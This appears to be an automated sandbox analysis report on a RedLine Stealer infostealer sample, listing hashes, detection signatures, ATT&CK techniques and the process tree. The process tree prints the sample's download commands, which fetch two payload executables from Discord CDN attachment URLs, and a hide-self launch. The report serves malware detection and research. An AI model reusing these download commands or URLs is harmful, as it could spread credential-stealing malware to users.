redline | 081ba60cfdc84fcd9c1bd234812c8dffdee559e44c2d54ab06522e94a4374254

Analysis

max time kernel
110s
max time network
124s
platform
windows10_x64
resource
win10-en-20210920
submitted
25-10-2021 13:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

081ba60cfdc84fcd9c1bd234812c8dffdee559e44c2d54ab06522e94a4374254.exe
Size

449KB
MD5

41965b4c7cd98b3f504a6273c097e599
SHA1

b3d88c8e7061bb5efae86e9b473e57dcd5cf2333
SHA256

081ba60cfdc84fcd9c1bd234812c8dffdee559e44c2d54ab06522e94a4374254
SHA512

7bd1ce8b1d08ace60d3652a8899e8bb087ba411f552bfed884ea49976cf1f27858f8625d064138d61fb8d6b5089b4372d2fad5be109fa3484a136acdf47e1719

Score

10^/10

redline discovery infostealer spyware stealer suricata upx

Malware Config

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\24091\18.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\24091\18.exe	family_redline

suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata
Downloads MZ/PE file
Executes dropped EXE 6 IoCs

Processes:

extd.exeextd.exeextd.exe18.exeTransmissibility.exeextd.exe

pid process

3988 extd.exe
4056 extd.exe
4316 extd.exe
4632 18.exe
4624 Transmissibility.exe
4640 extd.exe

pid	process
3988	extd.exe
4056	extd.exe
4316	extd.exe
4632	18.exe
4624	Transmissibility.exe
4640	extd.exe

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\9D79.tmp\9D8A.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\9D79.tmp\9D8A.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\9D79.tmp\9D8A.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\9D79.tmp\9D8A.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\9D79.tmp\9D8A.tmp\extd.exe	upx

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

18.exe

pid process

4632 18.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

18.exeTransmissibility.exe

description pid process

Token: SeDebugPrivilege 4632 18.exe
Token: SeDebugPrivilege 4624 Transmissibility.exe

pid	process
4632	18.exe

description	pid	process
Token: SeDebugPrivilege	4632	18.exe
Token: SeDebugPrivilege	4624	Transmissibility.exe

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

081ba60cfdc84fcd9c1bd234812c8dffdee559e44c2d54ab06522e94a4374254.execmd.exe

description	pid	process	target process
PID 4280 wrote to memory of 4024	4280	081ba60cfdc84fcd9c1bd234812c8dffdee559e44c2d54ab06522e94a4374254.exe	cmd.exe
PID 4280 wrote to memory of 4024	4280	081ba60cfdc84fcd9c1bd234812c8dffdee559e44c2d54ab06522e94a4374254.exe	cmd.exe
PID 4024 wrote to memory of 3988	4024	cmd.exe	extd.exe
PID 4024 wrote to memory of 3988	4024	cmd.exe	extd.exe
PID 4024 wrote to memory of 4056	4024	cmd.exe	extd.exe
PID 4024 wrote to memory of 4056	4024	cmd.exe	extd.exe
PID 4024 wrote to memory of 4316	4024	cmd.exe	extd.exe
PID 4024 wrote to memory of 4316	4024	cmd.exe	extd.exe
PID 4024 wrote to memory of 4632	4024	cmd.exe	18.exe
PID 4024 wrote to memory of 4632	4024	cmd.exe	18.exe
PID 4024 wrote to memory of 4632	4024	cmd.exe	18.exe
PID 4024 wrote to memory of 4624	4024	cmd.exe	Transmissibility.exe
PID 4024 wrote to memory of 4624	4024	cmd.exe	Transmissibility.exe
PID 4024 wrote to memory of 4640	4024	cmd.exe	extd.exe
PID 4024 wrote to memory of 4640	4024	cmd.exe	extd.exe

C:\Users\Admin\AppData\Local\Temp\081ba60cfdc84fcd9c1bd234812c8dffdee559e44c2d54ab06522e94a4374254.exe
"C:\Users\Admin\AppData\Local\Temp\081ba60cfdc84fcd9c1bd234812c8dffdee559e44c2d54ab06522e94a4374254.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4280

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9D79.tmp\9D8A.tmp\9D8B.bat C:\Users\Admin\AppData\Local\Temp\081ba60cfdc84fcd9c1bd234812c8dffdee559e44c2d54ab06522e94a4374254.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:4024

C:\Users\Admin\AppData\Local\Temp\9D79.tmp\9D8A.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\9D79.tmp\9D8A.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
PID:3988

C:\Users\Admin\AppData\Local\Temp\9D79.tmp\9D8A.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\9D79.tmp\9D8A.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/902178779198279712/902179114025386015/18.exe" "18.exe" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
PID:4056

C:\Users\Admin\AppData\Local\Temp\9D79.tmp\9D8A.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\9D79.tmp\9D8A.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/902178779198279712/902179166525460510/Transmissibility.exe" "Transmissibility.exe" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
PID:4316

C:\Users\Admin\AppData\Local\Temp\24091\18.exe
18.exe
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4632

C:\Users\Admin\AppData\Local\Temp\24091\Transmissibility.exe
Transmissibility.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4624

C:\Users\Admin\AppData\Local\Temp\9D79.tmp\9D8A.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\9D79.tmp\9D8A.tmp\extd.exe "" "" "" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
PID:4640

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\24091\18.exe
MD5
c6a841a21a23a82c28f743bc6710ad32

SHA1
cbea54744a5bcb7f387499fc5bfe87359da53457

SHA256
99ebdf54c2a6705f6c1cc055e4f0eba0be71eab09acb3ecd71fe5923143047cf

SHA512
71e2637a07c340551461eb261eb173e2473095e98e420b1c99aea5a6906f2b1e97bd7441667977eb79dbdf60aa728cb46f17cf778cabf453c2a2f7b173d1ee72

Download Submit
C:\Users\Admin\AppData\Local\Temp\24091\18.exe
MD5
c6a841a21a23a82c28f743bc6710ad32

SHA1
cbea54744a5bcb7f387499fc5bfe87359da53457

SHA256
99ebdf54c2a6705f6c1cc055e4f0eba0be71eab09acb3ecd71fe5923143047cf

SHA512
71e2637a07c340551461eb261eb173e2473095e98e420b1c99aea5a6906f2b1e97bd7441667977eb79dbdf60aa728cb46f17cf778cabf453c2a2f7b173d1ee72

Download Submit
C:\Users\Admin\AppData\Local\Temp\24091\Transmissibility.exe
MD5
ee7b54950381499d349cc3d50d2bdc0d

SHA1
bf39e0fa559e5b9d1a5b5aeefd6075bacf49799c

SHA256
622c21879b0776c3d01bb72cdd16bc83238d8464170871491d54367c4a295447

SHA512
86372cfcb5360cc1123bc1c15761489fc0c9c6616e30b8b34927b62a9aa69fe0e2838c07f72c7d0e569add2f7f6786efafe0698e000d099f122a64a5fe18b247

Download Submit
C:\Users\Admin\AppData\Local\Temp\24091\Transmissibility.exe
MD5
ee7b54950381499d349cc3d50d2bdc0d

SHA1
bf39e0fa559e5b9d1a5b5aeefd6075bacf49799c

SHA256
622c21879b0776c3d01bb72cdd16bc83238d8464170871491d54367c4a295447

SHA512
86372cfcb5360cc1123bc1c15761489fc0c9c6616e30b8b34927b62a9aa69fe0e2838c07f72c7d0e569add2f7f6786efafe0698e000d099f122a64a5fe18b247

Download Submit
C:\Users\Admin\AppData\Local\Temp\9D79.tmp\9D8A.tmp\9D8B.bat
MD5
2235e6ea5a6c35623fa12dc38e494197

SHA1
c96a3c512ac498caa303613277c2b256409ca0b9

SHA256
441a3049faedf0e8e669eac0964f6a1855c683cca67ed271946014f72e70ceba

SHA512
a61cc726413877382b235e9f9d32fa3eed8bc6cd890ffbd37e5dab8e0b79fa3999fb6569da09b9e01f2ae461712a0cecc01bdf8bb0776d9550441bdfa6af8969

Download Submit
C:\Users\Admin\AppData\Local\Temp\9D79.tmp\9D8A.tmp\extd.exe
MD5
b019efc4814c7a73b1413a335be1fa13

SHA1
6e093c94cfa4a0fe25e626875f2b06a5cbc622d2

SHA256
a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e

SHA512
d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b

Download Submit
C:\Users\Admin\AppData\Local\Temp\9D79.tmp\9D8A.tmp\extd.exe
MD5
b019efc4814c7a73b1413a335be1fa13

SHA1
6e093c94cfa4a0fe25e626875f2b06a5cbc622d2

SHA256
a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e

SHA512
d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b

Download Submit
C:\Users\Admin\AppData\Local\Temp\9D79.tmp\9D8A.tmp\extd.exe
MD5
b019efc4814c7a73b1413a335be1fa13

SHA1
6e093c94cfa4a0fe25e626875f2b06a5cbc622d2

SHA256
a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e

SHA512
d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b

Download Submit
C:\Users\Admin\AppData\Local\Temp\9D79.tmp\9D8A.tmp\extd.exe
MD5
b019efc4814c7a73b1413a335be1fa13

SHA1
6e093c94cfa4a0fe25e626875f2b06a5cbc622d2

SHA256
a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e

SHA512
d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b

Download Submit
C:\Users\Admin\AppData\Local\Temp\9D79.tmp\9D8A.tmp\extd.exe
MD5
b019efc4814c7a73b1413a335be1fa13

SHA1
6e093c94cfa4a0fe25e626875f2b06a5cbc622d2

SHA256
a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e

SHA512
d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b

Download Submit
memory/3988-117-0x0000000000000000-mapping.dmp

Download
memory/4024-115-0x0000000000000000-mapping.dmp

Download
memory/4056-120-0x0000000000000000-mapping.dmp

Download
memory/4316-122-0x0000000000000000-mapping.dmp

Download
memory/4624-143-0x0000018640910000-0x0000018640C3C000-memory.dmp

Filesize
3.2MB

Download
memory/4624-158-0x0000018644040000-0x0000018644041000-memory.dmp

Filesize
4KB

Download
memory/4624-132-0x0000018625F70000-0x0000018625F71000-memory.dmp

Filesize
4KB

Download
memory/4624-126-0x0000000000000000-mapping.dmp

Download
memory/4624-157-0x0000018643910000-0x0000018643B6C000-memory.dmp

Filesize
2.4MB

Download
memory/4624-156-0x0000018641F40000-0x0000018642260000-memory.dmp

Filesize
3.1MB

Download
memory/4624-159-0x0000018640830000-0x0000018640831000-memory.dmp

Filesize
4KB

Download
memory/4624-155-0x00000186408D5000-0x00000186408D7000-memory.dmp

Filesize
8KB

Download
memory/4624-146-0x00000186408D4000-0x00000186408D5000-memory.dmp

Filesize
4KB

Download
memory/4624-145-0x00000186408D2000-0x00000186408D4000-memory.dmp

Filesize
8KB

Download
memory/4624-144-0x00000186408D0000-0x00000186408D2000-memory.dmp

Filesize
8KB

Download
memory/4632-137-0x0000000005A90000-0x0000000005A91000-memory.dmp

Filesize
4KB

Download
memory/4632-151-0x0000000006C80000-0x0000000006C81000-memory.dmp

Filesize
4KB

Download
memory/4632-141-0x00000000054E0000-0x00000000054E1000-memory.dmp

Filesize
4KB

Download
memory/4632-139-0x0000000002DB0000-0x0000000002DB1000-memory.dmp

Filesize
4KB

Download
memory/4632-140-0x00000000055B0000-0x00000000055B1000-memory.dmp

Filesize
4KB

Download
memory/4632-147-0x00000000065A0000-0x00000000065A1000-memory.dmp

Filesize
4KB

Download
memory/4632-148-0x0000000005820000-0x0000000005821000-memory.dmp

Filesize
4KB

Download
memory/4632-149-0x0000000006420000-0x0000000006421000-memory.dmp

Filesize
4KB

Download
memory/4632-150-0x0000000006AA0000-0x0000000006AA1000-memory.dmp

Filesize
4KB

Download
memory/4632-142-0x0000000005540000-0x0000000005541000-memory.dmp

Filesize
4KB

Download
memory/4632-152-0x00000000070D0000-0x00000000070D1000-memory.dmp

Filesize
4KB

Download
memory/4632-153-0x0000000007E30000-0x0000000007E31000-memory.dmp

Filesize
4KB

Download
memory/4632-154-0x00000000072F0000-0x00000000072F1000-memory.dmp

Filesize
4KB

Download
memory/4632-138-0x0000000005480000-0x0000000005481000-memory.dmp

Filesize
4KB

Download
memory/4632-136-0x0000000002DA0000-0x0000000002DA1000-memory.dmp

Filesize
4KB

Download
memory/4632-134-0x0000000000C20000-0x0000000000C21000-memory.dmp

Filesize
4KB

Download
memory/4632-124-0x0000000000000000-mapping.dmp

Download
memory/4640-128-0x0000000000000000-mapping.dmp

Download